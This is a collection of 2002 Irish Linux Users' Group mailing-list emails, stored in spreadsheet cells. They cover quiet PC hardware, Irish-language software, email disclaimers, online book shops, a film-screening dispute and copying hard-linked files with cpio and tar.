 dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; An old laptop would probably be ideal.  That way, it comes with its own 
&gt; UPS (the battery).
D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
card and the cable for it (about 180 dollars). So it has to be a pc, with
a pci 2.2 connector (ie some pentiums, and anything above) &gt; 
&gt; Some people strip down old 486 boxes, take out the hard drive, disable
&gt; the fans, and run the thing from just a floppy drive or a CDR you've
&gt; burned for the purpose.  
I'd do that with my 166, but the psu has a fan. And a 486 wont support my
wireless card :( I know. I'm awkward,
          Greg
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 12:06:35PM +0100, Greg Farrel wrote:
&gt; 
&gt; &gt; An old laptop would probably be ideal.  That way, it comes with its own 
&gt; &gt; UPS (the battery).
&gt; D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
&gt; card and the cable for it (about 180 dollars). So it has to be a pc, with
&gt; a pci 2.2 connector (ie some pentiums, and anything above)
&gt; 
&gt;  &gt; 
&gt; &gt; Some people strip down old 486 boxes, take out the hard drive, disable
&gt; &gt; the fans, and run the thing from just a floppy drive or a CDR you've
&gt; &gt; burned for the purpose.  
&gt; I'd do that with my 166, but the psu has a fan. And a 486 wont support my
&gt; wireless card :( I know. I'm awkward,Try www.quietpc.com.  Don't know if they have fanless PSUs but they claim
to have really, really quiet ones.Later,
Kenn
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 10:19:50PM -0700, Rick Moen wrote:
&gt; Some people strip down old 486 boxes, take out the hard drive, disable
&gt; the fans, and run the thing from just a floppy drive or a CDR you've
&gt; burned for the purpose.  what about using a pcmcia card and a compaq flash card?  or doing an
nfs boot to a server in a noiser part of the house?  (the boiler room
or something like that)kevin--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</si>
  <si>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Quoting Greg Farrel (greg@netsoc.tcd.ie):&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://www.sysadminday.com/
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:04:44PM +0100, Alan Horkan wrote:
&gt; does Spanish still count as a foreign language in America?
&gt; :)yep, that's what i learned as it seemed more useful then the other
choice: french.  and that's what seems to count as "internationalisation":
support of spanish.&gt; Watch out for the political indoctrination at these irish language
&gt; schools, when i was teenager they had use marching saluting the flag
&gt; singing the national anthem and the college anthem.  Presumably they treat
&gt; adult learners with a little more dignity and dont send them home for a
&gt; minor outburst of English in emotional circustances despite having better
&gt; Irish than half of the other people there.if i go to a class, i'm there to learn.  if they throw in anthems or
politics, i'll take what i can learn from that and i'll take in a new
perspective, but i'll only do that with my critical thinking cap on.
just like i do when i watch mass media.  and yes, from the one irish
course i took in dublin, they do the national anthem.  which is fine
really - i started off each day in school in america with the pledge of
allegience (with the under god bit in it which annoyed my dad to no end).
if that sort of thing didn't stick at the age of five, i severely doubt
it will stick now.&gt; Just to mention open source software agus gaeilge, OpenOffice could do
&gt; with having an Irish ispell dictionary converted to work with it.
&gt; Abiword already has irish spell checking and a few of the interface
&gt; strings translated (was about 85% about 18 months ago but it has drifted
&gt; to some horribly small percentage).and see, that would be my retort to any overly zealous irish speaker.
there's a huge opportunity for a fully irish computing environment in
free software.  and yet i don't see much action from official irish
organisations.  the reason mandrake and some others have the irish
support they have is because of individuals like donnacha.kevin--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</si>
  <si>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On Wed, 2002-07-31 at 12:38, kevin lyda wrote:
&gt; and see, that would be my retort to any overly zealous irish speaker.
&gt; there's a huge opportunity for a fully irish computing environment in
&gt; free software.  and yet i don't see much action from official irish
&gt; organisations.  the reason mandrake and some others have the irish
&gt; support they have is because of individuals like donnacha.Just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it's
a win-win situation ;).cheers,
Arkaitz-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 12:23:04PM +0100, Dermot Beirne wrote:
&gt; I will be out of the office starting  02/08/2002 and will not return until
&gt; 06/08/2002.
...
&gt; The information in this email is confidential and may be legally
[7+ line sig deleted]an automated message to ilug.  one of those goofy confidentiality
signatures.  more then four lines in a sig.is this a record?kevin--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</si>
  <si>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On Fri, 2 Aug 2002, kevin lyda wrote:&gt; On Fri, Aug 02, 2002 at 12:23:04PM +0100, Dermot Beirne wrote:
&gt; &gt; I will be out of the office starting  02/08/2002 and will not return until
&gt; &gt; 06/08/2002.
&gt; ...
&gt; &gt; The information in this email is confidential and may be legally
&gt; [7+ line sig deleted]
&gt; 
&gt; an automated message to ilug.  one of those goofy confidentiality
&gt; signatures.  more then four lines in a sig.this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of).now, considering the critical nature of this leak, if you do not 
receive an adequate reply i think one would be duty bound to raise 
the matter again, and again if needs be, until one gets a 
satisfactory reply.also,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systems.finally, the email-disclaimers advocacy site 	http://www.emaildisclaimers.com/may prove to be a useful resource. rather strangely one of the quotes 
on the front-page of their site is:	'The disclaimers added to the end of emails are not legally 
	binding, but it's always good practice to try and disclaim liability'	-- Michael Chissick, Head of Internet law at Field Fisher 
	WaterhouseHowever, i suggest this quote, partly the initial part, be ignored
and that other more favourable quotes (by self-aggrandising
pundits^W^Wleading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 its just a
rumour (http://www.weblaw.co.uk/artemail.htm).Anyway, please: Email exel.com!!!&gt; kevinNB: This email is copyright 2002 Paul Jakma. By reading this email
you agree to compensate me by paying me the sum of EUR200 - please
contact the copyright author for further details on settling your
fee. If you do not agree, please unread this email and delete this
email immediately. Further, this email is copyright protected through
the use of ASCII ROT-8 encryption. Circumvention of this digital
copyright protection may be a criminal offense in certain
jurisdictions.(and if it isnt in your jurisdiction, dont worry, the WIPO is working
tirelessly to make sure it will be).regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
"At least they're ____________x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008__x0008_EXPERIENCED incompetents"-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 03, 2002 at 12:00:34AM +0100, Paul Jakma wrote:
&gt; finally, the email-disclaimers advocacy site 
&gt; 
&gt; 	http://www.emaildisclaimers.com/sites like this make me question my opposition to capital punishment.
"This month's Q&amp;A: Is it better to prepend or append disclaimer
statements?"  augh!  and they admit they're pointless - in reality they're
just the legal world's version of mandatory email fashion accessories.kevin--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</si>
  <si>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On Sat, 3 Aug 2002, kevin lyda wrote:&gt; sites like this make me question my opposition to capital
&gt; punishment.:)&gt; "This month's Q&amp;A: Is it better to prepend or append disclaimer
&gt; statements?"  augh!  and they admit they're pointless - in reality
&gt; they're just the legal world's version of mandatory email fashion
&gt; accessories.not legal, more management/corporate fashion. cause most of the
actual /legal/ opinion on the web i've found on the web indicates:1. they should be used /sparingly/blanket pre/appending of disclaimers /dilutes/ any legal
effectiveness they have.2. they are not binding, and have little meaning other than in 
certain situations.they are not binding. though there are some situations where for proffessional reasons one
may wish to indicate the standing of an email. (eg legal advice "this
is / is not legal advice" type of thing. But again, this means 
disclaimers need to context-specific. (see 1.)3. there is precedence that blanket disclaimers, under UK law, have 
no standing and that rather (common sense this) it is the context of 
the situation that determines the legal effects of an email.See the norwich union case. Anyway, my top tips to help superiors who've fallen for disclaimers 
to see sense:1. server side appends breaks email standards. (unless always done 
correctly - nearly impossible, cause then server has to understand 
every possible type of client encoding).1a. it /does/ break certain types of encryption, that depend on the 
body being untouched. (eg X.509? kate brought this up ages ago).1b. iirc, it contravenes MIME to pre/append non mime-typed text. Most 
mailers will work around this and display the mail 'correctly', some 
might not though. Eg the message might not be displayed, or the 
disclaimer might not be displayed.1c. the correct place for disclaimers is on the client side. this 
also allows the user to select appropriate disclaimer for appropriate 
context (or no disclaimer at all).2. blanket appended disclaimers are of dubious legal effectiveness. 
(dilution, NU case in UK)3. generic disclaimer text is of dubious legal effectiveness. indeed
it will often be completely inappropriate ('this message is
confidential' on list mail). see 1c. Also, it needs to be written by 
an actual lawyer.4. A lot of big multinational corporations do /not/ append 
disclaimers. (ones i know of: Compaq (deceased), Motorol (iirc), 
Microsoft (iirc)).Useful link:http://www.goldmark.org/jeff/stupid-disclaimers/
(and see links at bottom of this page).finally, if you cant get reason to prevail and you have to agree to
implementing server side disclaimers, you can still resort to:	"that'll be done just as soon as the company stationary has
	disclaimers printed on them. oh, and i guess we'll have to play a
	disclaimer before or after all our telephone calls too? 
	Wait, that would cause a problem for faxes wouldnt it?"&gt; kevinDisclaimer: IANAL, all the above might be wrong, i might even be 
intentionally misleading you. who knows.. go check it out for 
yourself.regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
A real patriot is the fellow who gets a parking ticket and rejoices
that the system works.
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
&gt; 
&gt; Hello,
&gt; 
&gt; What are your recommendations for buying books (technical and
&gt; otherwise) online, from Irish or European sellers. Is there 
&gt; anywhere that has as good a selection as, say, Amazon but
&gt; deals in Euro?amazon.de and amazon.fr ? :-)C.
-- 
Caolan McNamara               |  caolan@skynet.ie  
http://www.skynet.ie/~caolan  |  +353 86 8161184
The way some people find fault, you'd think there was a reward-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Caolan McNamara wrote:
&gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
&gt; &gt; 
&gt; &gt; Hello,
&gt; &gt; 
&gt; &gt; What are your recommendations for buying books (technical and
&gt; &gt; otherwise) online, from Irish or European sellers. Is there 
&gt; &gt; anywhere that has as good a selection as, say, Amazon but
&gt; &gt; deals in Euro?
&gt; 
&gt; amazon.de and amazon.fr ? :-)Having recently checked out both of these, for a selection of
books, the exact same basket of books cost more in both .de and
.fr (taking delivery charges, VAT et al into account) than buying
the same thing in amazon.co.ukThe books I used to check were 
1) C unleashed (Heathfield et al)
2) Design Patterns (Gamma et al)
3) Computer Graphics, principles and practice (Foley et al)I was hugely surprised that amazon.co.uk worked out cheapest - by
a considerable margin, too - something like 12 euros after
freight was taken into account.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">What's wrong with good ol' www.eason.ie ?Delivery isn't too expensive, and they seem to have a reasonable stocklist
... not only that, but they've got b&amp;m[0] stores too ...P
[0] Bricks 'n' Mortar&gt; -----Original Message-----
&gt; &gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:
&gt; &gt; &gt; 
&gt; &gt; &gt; Hello,
&gt; &gt; &gt; 
&gt; &gt; &gt; What are your recommendations for buying books (technical and
&gt; &gt; &gt; otherwise) online, from Irish or European sellers. Is there 
&gt; &gt; &gt; anywhere that has as good a selection as, say, Amazon but
&gt; &gt; &gt; deals in Euro?
&gt; 
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 04:24:09PM +0100, Joe Desbonnet wrote:
&gt; I've found Micromail in Cork quite good:play247.com seems to be a good site for dvd's.  prices are in sterling,
but they have free shipping.  plus they're selling buffy season 5 dvd's
for Â£10 less then blackstar...kevin--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Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorted.  I've got someone...Thanks,
ConorOn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Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  1:32pm  up 75 days, 22:50,  0 users,  load average: 0.00, 0.00, 0.00
Hobbiton.cod.ie
  1:30pm  up 18 days, 19:54,  1 user,  load average: 0.24, 0.12, 0.03-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,I'm looking to get my hands on
either Doom I or II for my PC.
Unfortunately I cannot access 
IDSoftware's site because of
the silly web-filtering system
in place here.Does anyone know where I can
buy a copy of Doom (which I will
be running on Linux...) online?
Last time I asked in Game they laughed
at me ;]I would ask to swap for Linux software
but that wouldn't be ethical or legal.
Hence the purchasing question.Regards,
Shane-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Ryan, Shane wrote:
&gt; hi all,
&gt; 
&gt; I'm looking to get my hands on
&gt; either Doom I or II for my PC.
&gt; Unfortunately I cannot access 
&gt; IDSoftware's site because of
&gt; the silly web-filtering system
&gt; in place here.
&gt; 
&gt; Does anyone know where I can
&gt; buy a copy of Doom (which I will
&gt; be running on Linux...) online?
&gt; Last time I asked in Game they laughed
&gt; at me ;]
&gt; 
&gt; I would ask to swap for Linux software
&gt; but that wouldn't be ethical or legal.
&gt; Hence the purchasing question.
&gt; 
&gt; Regards,
&gt; Shane
&gt; there was a copy of Doom 1 that came free with RedHat 5.2 - 
unfortunately, it doesn't seem to be on the newer CDs.get the last laugh by going in, and saying that ID soft actually 
released a Linux wrapper for the game. you need to buy the CDs, though, 
then download the free wrapper.-- 
Kae Verens
http://www.contactjuggling.org/users/kverens/
http://www.contactjuggling.org/ (webmaster)
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Moved from the ILUG list.  Not _entirely_ offlist as requested, but
close enough.]Quoting Alan Horkan (horkana@tcd.ie):&gt; More likely we would try and get it when it comes out on video/dvd and
&gt; show it then (which AFAIK is legal as we are non profit private
&gt; organisation having a private showing and not charging our members for
&gt; the showing. any opinions on the legality of this should be sent
&gt; offlist).
One bloke's opinion:
Date: Sat, 01 Jun 2002 00:18:29 -0700
From: "J.T.S. Moore" 
Reply-To: jtsmoore@pacificnet.net
To: Marc MERLIN ,
   Daniel Isacc Walker 
CC: svlug@svlug.org, Rick Moen , sluglug@sluglug.ucsc.edu,
   Peter Belew , "Eric A. Perlman" ,
   i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu
Subject: REVOLUTION OS is now authorized for UC Santa Cruz screeningTo all,I have read the series of e-mails related to the unauthorized UC Santa
Cruz screening that was scheduled for June 1.  I sincerely appreciate
IEEE's good faith effort to correct the mistake.Consequently, so as not to inconvenience the people planning to attend
the screening, I want to give IEEE and SlugLUG permission to screen
REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to
hold off on attending the screening for the simple reason that I am
trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I
would prefer that SVLUG's members have a chance to see a nice 35mm print
of the film.  If my distributor is unable to book the film into a
theater in the Bay Area, I promise that I will work with SVLUG to
quickly set up a screening for its members.I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I'm a
vegetarian.  I simply thought Open Source and Free Software were compelling subjects
worth exploring and documenting.  As a result, I came to admire many
aspects of the Open Source movement and chose to focus the documentary
on the movement's positive history.  However, I do not think I should be
punished for telling the story of Free Software and Open Source by
having my intellectual property misappropriated.   More practically, my
feelings about Open Sourcing REVOLUTION OS are abundantly clear when you
see the explicit copyright notice at the end of the film's credits.  I realize that making a videotape copy for personal use from a TV airing
is considered fair use.  I believe in a healthy fair use doctrine. 
However, there is a big difference between viewing your personal copy at
home with a few friends and holding a publicly advertised screening on a
university campus.  So I freely admit my objection to unauthorized
screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I
believe that the creator of a piece of intellectual property should
retain the choice to Open Source their IP.  If the Open Source movement
is not voluntary then it is really just piracy.One of the reasons I am concern with unauthorized group screenings of
the film, is that my distributor is planning in a few weeks to begin
selling VHS copies of the film for educational/institutional use with a
license permitting noncommercial large group screenings.  We hope to use
the money from these sales to fund the authoring and replication of the
DVD.  I want to release the DVD as soon as possible, but I cannot afford
to take on anymore REVOLUTION OS-related debt.  Thus the importance of
preserving the educational/institutional market.Frequently, I will read comments on Slashdot and other mailing lists
that justify the piracy of music on the grounds that it benefits the
artists and only hurts the greedy record labels.  Well, in the case of
REVOLUTION OS there is no multinational media conglomerate to punish. 
It's just me.  I made and financed the film on my own.  I have worked
full-time for almost three years without a salary.  The only way I will
get out of debt and have a chance to make another film is if people seek
out legal opportunities to view REVOLUTION OS.I truly appreciate the enthusiasm of the Open Source community for
REVOLUTION OS, and I am grateful that people do want to see it.  If you
will just bare with me, I will figure out a way for all interested
persons to legally view it.I hope the dust up over the unauthorized, and now authorized, screening
at UC Santa Cruz has not inconvenienced anyone.Sincerely,J.T.S. Moore
Director, REVOLUTION OS
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
duly noteddefinately would make the extra effort to talk directly with these people
and mention to the IFC (local arts cinema) about a more approriate
showing.Would enough people in ILUG be interested to cover the possible costs
of a showing some Saturday afternoon/morning.Anyway this is distant future anyway i have too much on my plate already.I hope the DVD they produce wont be region coded, damned anti-consumer
cartels and monoplistic tendencies of coporate greed.Is this the same film the 2600 people are always going on about or is that
something else?Later
AlanOn Wed, 14 Aug 2002, Rick Moen wrote:&gt; Date: Wed, 14 Aug 2002 12:02:13 -0700
&gt; From: Rick Moen 
&gt; To: Alan Horkan 
&gt; Cc: social@linux.ie
&gt; Subject: Re: [ILUG] Linux: the film.
&gt;
&gt; [Moved from the ILUG list.  Not _entirely_ offlist as requested, but
&gt; close enough.]
&gt;
&gt; Quoting Alan Horkan (horkana@tcd.ie):
&gt;
&gt; &gt; More likely we would try and get it when it comes out on video/dvd and
&gt; &gt; show it then (which AFAIK is legal as we are non profit private
&gt; &gt; organisation having a private showing and not charging our members for
&gt; &gt; the showing. any opinions on the legality of this should be sent
&gt; &gt; offlist).
&gt;
&gt;
&gt; One bloke's opinion:
&gt;
&gt;
&gt; Date: Sat, 01 Jun 2002 00:18:29 -0700
&gt; From: "J.T.S. Moore" 
&gt; Reply-To: jtsmoore@pacificnet.net
&gt; To: Marc MERLIN ,
&gt;    Daniel Isacc Walker 
&gt; CC: svlug@svlug.org, Rick Moen , sluglug@sluglug.ucsc.edu,
&gt;    Peter Belew , "Eric A. Perlman" ,
&gt;    i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu
&gt; Subject: REVOLUTION OS is now authorized for UC Santa Cruz screening
&gt;
&gt; To all,
&gt;
&gt; I have read the series of e-mails related to the unauthorized UC Santa
&gt; Cruz screening that was scheduled for June 1.  I sincerely appreciate
&gt; IEEE's good faith effort to correct the mistake.
&gt;
&gt; Consequently, so as not to inconvenience the people planning to attend
&gt; the screening, I want to give IEEE and SlugLUG permission to screen
&gt; REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to
&gt; hold off on attending the screening for the simple reason that I am
&gt; trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I
&gt; would prefer that SVLUG's members have a chance to see a nice 35mm print
&gt; of the film.  If my distributor is unable to book the film into a
&gt; theater in the Bay Area, I promise that I will work with SVLUG to
&gt; quickly set up a screening for its members.
&gt;
&gt; I realize there may be some members of SlugLUG who are unhappy that I
&gt; originally requested that they not hold an unauthorized screening of
&gt; REVOLUTION OS.  There are several reasons why I made the request, and
&gt; none of them have anything to do with me wanting to be a jerk.
&gt;
&gt; One SlugLUG member commented that it was odd that a movie about the Open
&gt; Source movement would not be available for open viewings.  Another
&gt; SlugLUG member remarked that my request smacks of Bill Gates's Open Letter
&gt; to Hobbyists.
&gt;
&gt; The bottomline is that I did make a film about the Open Source movement,
&gt; but to assume that automatically means that the film is itself Open
&gt; Sourced seems to be a little bit of a stretch.  If I made a movie about
&gt; the history of vegetarianism that would not automatically mean I'm a
&gt; vegetarian.
&gt;
&gt; I simply thought Open Source and Free Software were compelling subjects
&gt; worth exploring and documenting.  As a result, I came to admire many
&gt; aspects of the Open Source movement and chose to focus the documentary
&gt; on the movement's positive history.  However, I do not think I should be
&gt; punished for telling the story of Free Software and Open Source by
&gt; having my intellectual property misappropriated.   More practically, my
&gt; feelings about Open Sourcing REVOLUTION OS are abundantly clear when you
&gt; see the explicit copyright notice at the end of the film's credits.
&gt;
&gt; I realize that making a videotape copy for personal use from a TV airing
&gt; is considered fair use.  I believe in a healthy fair use doctrine.
&gt; However, there is a big difference between viewing your personal copy at
&gt; home with a few friends and holding a publicly advertised screening on a
&gt; university campus.  So I freely admit my objection to unauthorized
&gt; screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I
&gt; believe that the creator of a piece of intellectual property should
&gt; retain the choice to Open Source their IP.  If the Open Source movement
&gt; is not voluntary then it is really just piracy.
&gt;
&gt; One of the reasons I am concern with unauthorized group screenings of
&gt; the film, is that my distributor is planning in a few weeks to begin
&gt; selling VHS copies of the film for educational/institutional use with a
&gt; license permitting noncommercial large group screenings.  We hope to use
&gt; the money from these sales to fund the authoring and replication of the
&gt; DVD.  I want to release the DVD as soon as possible, but I cannot afford
&gt; to take on anymore REVOLUTION OS-related debt.  Thus the importance of
&gt; preserving the educational/institutional market.
&gt;
&gt; Frequently, I will read comments on Slashdot and other mailing lists
&gt; that justify the piracy of music on the grounds that it benefits the
&gt; artists and only hurts the greedy record labels.  Well, in the case of
&gt; REVOLUTION OS there is no multinational media conglomerate to punish.
&gt; It's just me.  I made and financed the film on my own.  I have worked
&gt; full-time for almost three years without a salary.  The only way I will
&gt; get out of debt and have a chance to make another film is if people seek
&gt; out legal opportunities to view REVOLUTION OS.
&gt;
&gt; I truly appreciate the enthusiasm of the Open Source community for
&gt; REVOLUTION OS, and I am grateful that people do want to see it.  If you
&gt; will just bare with me, I will figure out a way for all interested
&gt; persons to legally view it.
&gt;
&gt; I hope the dust up over the unauthorized, and now authorized, screening
&gt; at UC Santa Cruz has not inconvenienced anyone.
&gt;
&gt; Sincerely,
&gt;
&gt; J.T.S. Moore
&gt; Director, REVOLUTION OS
&gt;
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>Interesting take..."But the more I think about it, the more you I realize that having
governments specify software licensing policies is a bad idea."http://www.oreillynet.com/pub/wlg/1840-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">I have about 60G of data which I need to copy from one disk to another.
However, I'm not sure how I should best copy it. The problem is the bulk of
the data is images and most of these image have two directory entries i.e.
there is a hard link to each file. If I copy them using cp -a or my usual
favourite of find .|cpio -pmd other_dir it's going to copy each file twice,
which is not what I want. dump / restore would take care of this if the
source filesystem wasn't reiserfs :-( Any suggestions ?
Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">How about rsync.It doesn't only work for remote files.MArk
On Fri, 2002-07-19 at 14:28, Niall O Broin wrote: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&gt; 
&gt; 
&gt; Niall
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 14:28:42 +0100
  | From: Niall O Broin 
  | 
  | I have about 60G of data which I need to copy from one disk
  | to another.  However, I'm not sure how I should best copy it.
  | The problem is the bulk of the data is images and most of these
  | image have two directory entries i.e. there is a hard link to
  | each file.  If I copy them using cp -a or my usual favourite of
  | find .|cpio -pmd other_dir  it's going to copy each file twice,
  | which is not what I want. dump / restore would take care of this
  | if the source filesystem wasn't reiserfs  :-(  Any suggestions ? do your (and my) favourite, it'll be Ok:  1. cpio(1) preserves hard links, i.e., if F1 and F2 are
     hard-linked and both are "copied", then the "copies"
     are also hard-linked.  this is true of all `cpio's
     (and `tar' and any other decent/usable archival tool,
     by definition (IMHO)).  2. `cpio -p' (at least `GNU cpio version 2.4.2') will only
     read/write (copy) the actual data bytes once.  I _think_
     this is true for all `cpio's (not just that GNU version),
     but am not certain. if you use an intermediate archive, e.g.:    cpio -o ... &gt;file;   ...;   cpio -i ... &lt;file then the actual data bytes are copied into the archive (file)
 under each name (e.g., as both F1 and F2).  but GNU `cpio' is
 smart about this in pass-through mode (`-p'), copying the data
 just once (or so I read the source).cheers!
	-blf-p.s. assuming this is a one-time operation that you won't repeat
    anytime soon (e.g., never; i.e., time isn't a major issue),
    and are not using any intermediate media/file (so storage
    isn't an issue), then even if `cpio' did read the data twice,
    so what? --- as long as, of course, it re-creates the hard
    links.  which it will.--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</si>
  <si>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Niall asked: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?How about something like:cd {dest.dir}
tar -C {source.dir} cf - | tar xf -tar cf - will pipe the tar file to stdout and tar xf - will untar it. This
should keep permissions and links, and if you do it as root you will keep
the owners too... :)Not tested, though. You may need other flags as well.-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
</t>
  </si>
  <si>
    <t xml:space="preserve">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interesting.The top of the poster refers you to www.decodes.com for a more up to date
online copy of the poster. However, www.decodes.com now is redirected to the
aforementioned acterna and . . . .
Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">http://spackle.xidus.net/info.php&gt;&gt;From the website:
"Spackle is designed to be a flexible client/server architecture for the 
gathering and displaying of statistics, primarily suited to monitoring 
servers. It's written in PHP and bash shell script, uses RRDtool  for stats 
logging, and PostgreSQL for the server-side database. (soon to support MySQL 
as well)"I had this up and running within a few hours. The hardest bit was getting 
PostgreSQL running as it's been a few years since I used it. I had a bit of a 
problem getting it to work on rh6.2 boxes but I documented the changes here: 
http://xeer.blogspot.com/?/2002_07_01_xeer_archive.html#79148596Web interface is simple, but functional. It has a simple way of distributing 
the monitoring scripts (which could be compromised but I digress), and the 
resulting graphs are pretty!Donncha.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I wasn't sure if that ever started up.
what irc server is #ilug on?Regards,
Shane-----Original Message-----
From: Niall O Broin [mailto:niall@linux.ie]
Sent: 19 July 2002 15:36
To: ilug@linux.ie
Subject: [ILUG] OSI protocol
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interesting.The top of the poster refers you to www.decodes.com for a more up to date
online copy of the poster. However, www.decodes.com now is redirected to the
aforementioned acterna and . . . .
Niall--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</si>
  <si>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  | Date: Fri, 19 Jul 2002 15:22:26 +0100
  | From: "Matthew French" 
  | 
  | Niall asked:
  |  &gt; I have about 60G of data which I need to copy from one disk to
  |  &gt; another.  [ ... ] The problem is the bulk of the data [ ... ]
  |  &gt; have two directory entries i.e. there is a hard link [ ... ]
  | 
  | How about something like:
  | 
  |    cd {dest.dir}
  |    tar -C {source.dir} cf - | tar xf -
  | 
  | tar cf - will pipe the tar file to stdout and tar xf - will untar it. This
  | should keep permissions and links, and if you do it as root you will keep
  | the owners too... :)
  | 
  |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c.60Gb of data,
 that will make a difference, at least in time and CPU
 resource consumed (albeit, in this case, not storage). the issue here is tar(1) (and cpio(1)) archives always
 contain the data for each name of a hard link.  this is
 (probably) for several reasons, and is not necessarily a
 bad thing.   e.g., it provides a degree of redundancy to
 help cope with bad media. the source `tar' is creating an archive, which is being
 written down the pipe (to be consumed by the sink `tar').
 that is why storage is not an issue per se here, as the
 full archive is not "saved" --- if it were, you'd need
 at least 2x60Gb, or over 120Gb!   (the extra is `tar's
 overhead, which is minimal but does add up, esp. when
 a "large" blocking factor is used.)cheers!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</si>
  <si>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On Fri, Jul 19, 2002 at 04:09:50PM +0100, Ryan, Shane wrote:
&gt; Hi,
&gt; 
&gt; I wasn't sure if that ever started up.
&gt; what irc server is #ilug on?
&gt; #linux on irc.linux.ieSteve
-- 
"Oh look, it's the Pigeon of Love."-- 
Irish Linux Users' Group: ilug@linux.ie
